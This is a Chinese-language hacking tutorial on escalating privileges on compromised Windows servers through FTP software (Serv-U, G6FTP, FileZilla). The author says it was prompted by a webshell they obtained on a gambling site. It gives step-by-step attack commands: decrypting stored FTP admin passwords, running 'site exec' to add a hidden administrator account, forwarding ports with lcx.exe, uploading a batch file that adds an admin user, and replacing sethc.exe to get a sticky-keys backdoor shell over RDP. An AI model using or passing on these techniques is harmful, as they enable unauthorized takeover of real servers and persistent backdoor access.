windows提權之ftp提權

0，起因，由於前幾天拿了一個菠菜站的webshell，但是只有iis權限，執行無法創建用戶等操作，更無法對整個服務器進行控制了，於是此時便需要提權了，對於一個剛剛入門的小白來說，此刻真正意識到了提權的重要性，於是便開始學習提取相關知識，以拿下該菠菜的站點。

提權前的準備工作

1，通常來說，不同的腳本所處的權限是不一樣的。這就意味著，如果該站點支持權限更高的腳本，我們可以上傳該權限更高的腳本的大馬，進而拿到更高的權限。

• asp/php 通常為匿名權限(網絡服務權限)
• aspx 通常為user權限
• jsp 通常為系統權限

2，提權中常常也需要進行信息收集：

• 內外網
• 服務器系統和版本位數
• 服務器的補丁情況
• 服務器的安裝軟件情況
• 服務器的防護軟件情況
• 端口情況
• 所支持的腳本情況
• ...............................等等

3，windows信息收集中常用的命令：

ipconfig /all    查看當前ip
net user         查看當前服務器賬號情況
netstat -ano     查看當前服務器端口開放情況
ver              查看當前服務器操作系統
systeminfo       查看當前服務器配置信息（補丁情況）
tasklist /svc    查看當前服務器進程情況
taskkill -pid pid號  結束某個pid號的進程
taskkill /im qq.exe /f 結束qq進程，如果對命令不清楚，可以使用taskkill /? 進行查看
net user v01cano v01cano /add 添加一個用戶名為v01cano密碼為v01cano的用戶
net localgroup administrators v01cano /add 將用戶v01cano添加到管理員組
whoami                   查看當前操作用戶（當前權限） 
 

4，FTP軟件提權：

常見的FTP軟件有server-u，g6ftp，filezilla。

server-u提權

• Server -u的默認端口為43958

server-u提權常用方法,一：

1，查看默認安裝目錄下的ServUDaemon.ini文件，進而查看用戶名和密碼，將密碼去cmd5.com找到對應的server-u的解密方式進行解密。

2，登入ftp，執行如下命令，創建用戶，並且加入到管理員組。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add
 

server-u提權常用方法二：

1，使用大馬直接創建ftp賬號，使用ftp賬號登入ftp。

2，然後再執行如下命令，創建系統賬號。

quote site exec net user v01cano v01cano /add

quote site exec net localgroup administrators v01cano /add

server-u提權常用方法三：

server-u的管理員賬號權限較大，相當於系統權限，可以通過管理員賬號直接創建用戶，並且加入到管理員組。

g6ftp提權：

科普：g6ftp的默認端口為8021，只偵聽在127.0.0.1的8021端口上，所以無法從外部直接訪問，需要進行端口轉發。

1，查找管理配置文件Remote.ini，將administrator管理密碼解密。解密得到administrator的管理員密碼為123456

2，首先進行查找該網站的可讀可寫目錄，然後上傳cmd.exe和lcx.exe到該目錄下。

3，查看網站根目錄的權限得知，此處網站的根目錄可讀可寫，直接上傳到網站跟目錄即可。上傳成功後，即可直接通過cmd.exe調用lcx.exe命令，查看lcx.exe的用法。

然後通過如下命令轉發端口，將127.0.0.1的8021端口通過8427端口轉發出去：

4，轉發成功後，通過g6ftp軟件進行連接，以管理員用戶登入

連接成功：

5，創建用戶並設置權限和執行批處理文件

創建用戶：右鍵，選擇new user

選擇根目錄為c盤：

賦予全部權限：

然後將批處理文件adduser.bat上傳到目標站點中：
adduser.bat中的文件內容為：即新建一個用戶名和密碼均為v01cano的用戶，並且加入到管理員組中。

net user v01cano v01cano /add
net localgroup administrators v01cano /add

然後在g6ftp軟件中加入批處理命令：

然後在控制臺登錄ftp，並且執行所加入的批處理命令：命令成功執行：

在目標機上查看，新建用戶成功，並且成功加入到了管理員組。

提權成功。

filezilla提權：

科普：filezilla默認端口為14147端口

1，找到默認安裝目錄下面有兩個敏感文件filezillaserver.xml(包含了用戶信息)和filezillaserver interface.xml(包含了管理信息)，查看用戶名和密碼：

2，進行端口轉發，方法類似g6ftp:

3，使用filezilla軟件進行遠程連接：

4，新建用戶並設置用戶的根目錄。

5，打開filezilla客戶端軟件，使用剛剛新建的用戶名和密碼進行連接：

6，連接成功以後，替換c:/windows/system32/sethc.exe文件。

7，直接遠程連接即可，win+r輸入mstsc即可打開遠程桌面。輸入靶機ip進行連接：不需要輸入用戶名和密碼，直接連續按下5次shift鍵，即可以管理員的身份打開cmd，然後創建用戶，或者直接輸入explorer.exe，進入靶機。遠控成功。

windows提權之ftp提權